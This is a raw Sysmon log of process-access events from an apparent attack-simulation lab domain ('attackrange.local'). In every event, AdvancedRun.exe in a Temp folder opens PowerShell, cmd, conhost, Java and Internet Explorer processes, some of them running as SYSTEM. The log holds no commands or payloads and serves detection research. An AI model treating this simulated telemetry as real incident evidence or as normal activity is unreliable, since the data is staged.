mp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077211Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.214{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077210Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.214{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077209Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.213{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077208Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.213{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program 
Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077207Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.213{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.213{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077205Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.213{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077204Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.212{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077203Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.212{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077202Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.212{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077201Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.212{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077200Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.211{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077199Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.210{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077198Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.209{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077197Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.209{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077196Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.209{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077195Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.208{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 